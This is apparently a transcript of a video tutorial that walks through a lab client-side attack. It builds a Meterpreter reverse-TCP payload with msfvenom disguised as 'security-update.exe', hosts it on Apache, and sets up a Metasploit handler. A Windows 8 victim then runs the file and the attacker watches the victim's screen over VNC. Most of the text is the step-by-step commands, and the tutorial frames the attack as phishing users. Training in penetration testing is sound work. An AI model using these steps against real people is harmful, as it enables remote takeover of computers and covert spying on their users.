Now, the good old days of being able to remotely hack a system because it had a service that had a buffer overflow have diminished. Very often we need to trick a user into installing something instead. And when we can install something locally to hack a machine, we call it a client-side vulnerability. So in this case, we're going to do that. It often involves phishing a user or tricking a user somehow. So what we're going to do is we're going to create a malicious payload using MSF Venom. And it's going to start a interpreter session on the victim machine. We'll set up a simple website in Kali that the victim is going to go to using a browser, and they're going to click on the payload. So we will have social engineered the person into doing this. We also have to set up a listener on Kali, because when the victim launches this thing, this malicious thing on the website, they're going to, in the background, connect back to us. And so then we go ahead and we pretend like we're the victim. We go to the fake website. We click on the executable, and it will start, it'll start a interpreter prompt, and then we'll use that to launch VNC. Now, just make sure that your Windows 8 architecture, in this case, is x64, and make sure you can ping. And then we're going to create the executable with one long line right here. So I'm going to try to have this handy so you can see it while I type it. So I'm on Kali, and I need to do this one long line in a command prompt. But the first thing I'm going to do is make sure I know the IP address of Windows 8 and also of Kali, and I'm going to make sure I can ping. So let me just go over to Windows 8. I've got Windows 8.1, 64-bit. I'm logging on as admin with capital $PA$W0RD. And I'm going to open a command prompt. And actually, I shouldn't have done that. I should just from start type CMD. Or let me just get start. Get the start page and type CMD for the command prompt. And it's going to be over here somewhere, I hope. It's a little bit slow. And when it comes up, I'm going to launch it. One more time, huh? So somewhere in here, command. There it is. Let me just open it up. ipconfig. Okay, this is 192.168.75.8. Let me just keep that in mind. Let me go over to Kali. I'm going to minimize Windows 8. Let me just, from Kali, just double check my IP. I'm opening a terminal right here, and let me just zoom in a little bit so we can see. Let me just check Kali's IP, ifconfig, I'm 192.168.75.154. Let me just clear. Okay, let me just make sure I can ping. Let me just say ping 192.168.75.8, which is Windows 8. Okay, I'm pinging. Control C to break. All right, very good. Now let me just clear. So I'm just kind of up at the top of the window there. And let's type this whole big long line. Let me just expand this so you can see the whole thing, because it needs to be one long line. We have to make sure we don't make any mistakes. So let's MSF Venom. We're not doing this in a Metasploit console. We're doing it in a normal terminal. TAC-P for payload, Windows / and actually this needs to be an x64. x64, let's fix that. Windows / x64, because our target is 64-bit. Interpreter reverse underscore TCP, telling the victim to connect back to us, even past its own firewall. TAC platform is Windows. TAC A for architecture, x64. TAC F, it's an exe. The L host, meaning Kali, the listener host, is 192.168.75.154. The L port is anything you want, but the default is 4444. The output file is in the root profile on the desktop. Yeah, call it whatever we like, something exe. Security-update.exe. Enter. Takes less than a minute usually, and it'll be somewhere between 7 and 10 kilobytes in size. It's quite small. Now, we'll just take it for granted that we are going to social engineer the user with a link or something. Okay, so here it is, about 7K in size, and it's sitting right here, and sure enough, there it is. Now, don't double click it. Of course, it won't run in Linux. So now the next thing to do is to set up the web server. So let's set up the web server here, and what we're going to do is, let me just get this so we can just see it. Okay. All right. Whoops, no, I went too far. I am going to make a directory in var www.html, which is where the Apache web server stuff is. The directory will be called share. I'm going to set permissions on it, chmod, change mode, so that the owner can do anything and everybody else can read and execute on this folder share. I'm then going to change ownership so that the service can use share. And then I'm going to copy that thing we just created to share. And I'll start Apache. So with this in mind here, let's make dir mkdir /var/www/html/share. Let's make a directory. No complaints, we did it. Let's set the permissions, chmod tac capr 755/var/www/html/share. Fine. Let's change ownership, chown tac capr www tac data to www tac data var www html share. So far so good. Let's copy the thing on the desktop /root, that's my profile, desktop with a capital D, security-update, got to make sure I do this, I type this right, exe to var www html/share. Okay, and then let's start the web server, service Apache 2, because it's version 2 start. Okay, so we now have this thing ready. The web server is ready. It's a really, really simple web server. Now we're going to start the Metasploit console and start a listener, a handler. And we're going to enter, so first of all, we're going to start MSF console. And we're going to create a handler. We're going to set the payload to agree with the same payload that we did in the Venomous exploit with the same listener host and the same listener port. So let's come over here now and let's clear and let's MSF console. This is the same, and I've pressed enter. This is the same as just clicking the little blue shield with the white M. It opens the exact same thing. So when the Metasploit console is open, we're going to run these commands here. And we're going to leave it alone and let it just sit there. Okay, so we can see that the Metasploit console is ready to run. And so what we're going to do now is I'm just going to type clear just so we have a little bit of room to breathe here. Let's set up our handler. So here we are, MSF. Unlike the Linux bash, where we were creating a payload with MSF Venom, the Metasploit console is not case sensitive. So we can type use multi-handler set payload Windows. Now it's got to agree x64 meterpreter /reverse _TCP. Press enter. Okay, let's set the listener host, and I'm lazy. I didn't hit the capital thing, so the capital key. So Kali's IP 192.168.75.154. Enter. Let's set the listener port to 4444. Enter. And with this, we're ready to let the listener start. We just type run. Or you can type the word exploit. They do exactly the same thing. Press enter. Now there is a listener that has started, a handler. Don't touch this, let it run in the background. Okay, so now we're going to go over to Windows 8 and we're going to open Opera and we're going to connect to that Kali IP /share and we're going to download this thing and we're going to run it. And then we're going to come back to Kali and see if there's a connection. Okay, I was having trouble with Windows 8. What I'm going to do is I'm going to switch over to another VM. All right, we've switched over to Windows 8. Now let's launch Internet Explorer. And let's just go to that site. So just right over here. Don't care if your default browser or not. We're going to go to http:// and we're going to go to 192.168.75.154/share. And there it is right there. Now, we have Windows Defender turned off. Let's hope that IE does not block this download. Let's go and grab it, see if we can get it. Do we want to, let's save it. Couldn't be verified, that's okay. Let's just go ahead and run, and let's see if it runs. Now, the fact that it's just kind of spinning here is actually good, because it means it's doing its thing in the background. Let's switch over to Kali, and let's see in Kali if we have a connection. So let's go to Kali, log in as root tour, and bingo, look at this. So you can see that it started the handler, that's where we left it, and sending stage, that means it's sending the malicious payload. The stager, which it doesn't show here, is that little payload that the user clicked on in the website, and then the full stage is the full meterpreter right here. So now we have a meterpreter session opened up. Very cool. So now we want to find out some information. Let's go over to our activity here. So we we've run this thing. We've verified we have a meterpreter session. We can then just get some information. We can run sysinfo, and we can even see our sessions here. Now let's just go back over to Kali. We're just going to have a little bit of fun because we're going to launch VNC. So sysinfo. You can see that we are on Windows 8. We hacked Windows 8. Now sometimes you can type sessions, tac L, to show that we have, okay, so we only have one session, so it's not showing it. Can we, if we had more than one session, we'd sessions tac L to list them. We can run the VNC right now. We can just say run VNC and have a little bit of fun. So run VNC. Now what'll happen is that Meterpreter is going to send over the VNC server, if you will, over to our victim, and it even created as some funky name. And then it opens the tight VNC viewer here. So right now we're on Kali. You can see this. We're on Kali, and we are looking at the desktop. We're looking at the desktop of our victim. So watch. When I switch over to Windows 8, so now you can see them kind of side by side. Let me just kind of minimize this a little bit, or I'm going to resize it a little bit just so it's easier for us to follow. We have a VNC session. So on the left-hand side, we have the victim. On the right-hand side, we have VNC. We can close or minimize the browser, and notice that it minimizes in our VNC here. Then in VNC, because this, I hope, is interactive, should be, we can do something. Let's open something up. Okay, so this one is actually set to just shadow. What we should have done is we should have set it to actually be interactive. So however, what's cool is that we're spying on the user. So if they open something up, when something happens on them, we see it. When they type something, we see it. When they go someplace, we see it. So let's watch. So on the victim, they're opening a browser to just someplace, whatever. Whatever, we don't really care. www.google.com. So they go to Google and they type in a search for hacking, and see we're watching everything they're doing. And this is exploiting a client-side vulnerability. We've tricked the user into installing something they shouldn't have, probably by using phishing. And now we've taken advantage of their client-side vulnerability.